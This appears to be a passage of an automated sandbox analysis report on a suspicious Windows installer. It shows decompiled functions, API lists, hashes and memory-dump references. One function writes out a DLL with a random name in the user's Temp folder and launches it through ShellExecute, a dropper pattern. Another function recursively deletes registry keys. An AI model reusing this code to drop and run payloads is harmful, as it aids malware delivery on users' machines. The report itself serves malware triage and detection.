                                                                            • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                            • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                            • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                            • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                          • MoveFileA.KERNEL32 ref: 004016C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 2621199633-2857477325
                                                                          • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                          • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                          • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                          • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                          0x00404635
                                                                          0x00404642
                                                                          0x00404648
                                                                          0x00404686
                                                                          0x00404686
                                                                          0x00404695
                                                                          0x0040469c
                                                                          0x00000000
                                                                          0x0040469e
                                                                          0x0040464a
                                                                          0x00404659
                                                                          0x00404661
                                                                          0x00404664
                                                                          0x00404676
                                                                          0x0040467c
                                                                          0x00404683
                                                                          0x00000000
                                                                          0x00404683
                                                                          0x00000000

                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                          • GetMessagePos.USER32 ref: 0040464A
                                                                          • ScreenToClient.USER32 ref: 00404664
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                          • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                          • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                          • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x328ac
					_t7 =  *0x79d938; // 0x328b0
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                                                          0x00402bb7
                                                                          0x00402bbf
                                                                          0x00402bcb
                                                                          0x00402bd4
                                                                          0x00402bd7
                                                                          0x00402bd7
                                                                          0x00402bdf
                                                                          0x00402be1
                                                                          0x00402be7
                                                                          0x00402bee
                                                                          0x00402bf0
                                                                          0x00402bf0
                                                                          0x00402c09
                                                                          0x00402c14
                                                                          0x00402c21
                                                                          0x00402c29
                                                                          0x00402c29
                                                                          0x00402c34

                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                          • MulDiv.KERNEL32(000328AC,00000064,000328B0), ref: 00402BF6
                                                                          • wsprintfA.USER32 ref: 00402C09
                                                                          • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                          • SetDlgItemTextA.USER32 ref: 00402C21
                                                                          • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: TextWindow$ItemShowTimerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 559026099-0
                                                                          • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                          • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                          • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                          • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                                                          0x00401e3c
                                                                          0x00401e45
                                                                          0x00401e47
                                                                          0x00401e4c
                                                                          0x00401e4d
                                                                          0x00401e58
                                                                          0x00401e5a
                                                                          0x00401e65
                                                                          0x00401e71
                                                                          0x00401e7f
                                                                          0x00401e91
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • wsprintfA.USER32 ref: 00401E5A
                                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                          • C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll, xrefs: 00401E53
                                                                          • %s %s, xrefs: 00401E4E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ExecuteShellwsprintf
                                                                          • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 2956387742-943549456
                                                                          • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                          • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                          • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                          • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                                                          0x00402af5
                                                                          0x00402afd
                                                                          0x00402b25
                                                                          0x00402b0f
                                                                          0x00402b56
                                                                          0x00000000
                                                                          0x00402b5e
                                                                          0x00402b23
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402b23
                                                                          0x00402b3a
                                                                          0x00000000
                                                                          0x00402b46
                                                                          0x00402b50

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                          • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                          • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                          • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                          0x00401d3e
                                                                          0x00401d45
                                                                          0x00401d74
                                                                          0x00401d7c
                                                                          0x00401d83
                                                                          0x00401d83
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00401D38
                                                                          • GetClientRect.USER32 ref: 00401D45
                                                                          • LoadImageA.USER32 ref: 00401D66
                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                          • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                          • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                          • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                          • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 35%
                                                                          			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













                                                                          0x0040454d
                                                                          0x00404551
                                                                          0x00404559
                                                                          0x0040455c
                                                                          0x0040455d
                                                                          0x0040455f
                                                                          0x00404561
                                                                          0x00404564
                                                                          0x00404564
                                                                          0x0040456b
                                                                          0x00404571
                                                                          0x00404571
                                                                          0x00404578
                                                                          0x00404583
                                                                          0x00404584
                                                                          0x00404587
                                                                          0x00404587
                                                                          0x00404594
                                                                          0x0040459f
                                                                          0x004045a2
                                                                          0x004045b4
                                                                          0x004045bb
                                                                          0x004045bc
                                                                          0x004045cb
                                                                          0x004045db
                                                                          0x004045f7

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                          • wsprintfA.USER32 ref: 004045DB
                                                                          • SetDlgItemTextA.USER32 ref: 004045EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                          • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                          • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                          • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                                          0x00401c19
                                                                          0x00401c22
                                                                          0x00401c2e
                                                                          0x00401c31
                                                                          0x00401c3b
                                                                          0x00401c3b
                                                                          0x00401c3e
                                                                          0x00401c42
                                                                          0x00401c4c
                                                                          0x00401c4c
                                                                          0x00401c4f
                                                                          0x00401c53
                                                                          0x00401c55
                                                                          0x00401ca2
                                                                          0x00401ca4
                                                                          0x00401cad
                                                                          0x00401cb5
                                                                          0x00401cb8
                                                                          0x00401cb8
                                                                          0x00401cc1
                                                                          0x00000000
                                                                          0x00401c57
                                                                          0x00401c5e
                                                                          0x00401c60
                                                                          0x00401c68
                                                                          0x00401c6b
                                                                          0x00401c93
                                                                          0x00401cc7
                                                                          0x00401cc7
                                                                          0x00401c6d
                                                                          0x00401c7b
                                                                          0x00401c83
                                                                          0x00401c86
                                                                          0x00401c86
                                                                          0x00401c6b
                                                                          0x00401cca
                                                                          0x00401ccd
                                                                          0x00401cd3
                                                                          0x004028d7
                                                                          0x004028d7
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                          • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                          • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                          • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 83%
                                                                          			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
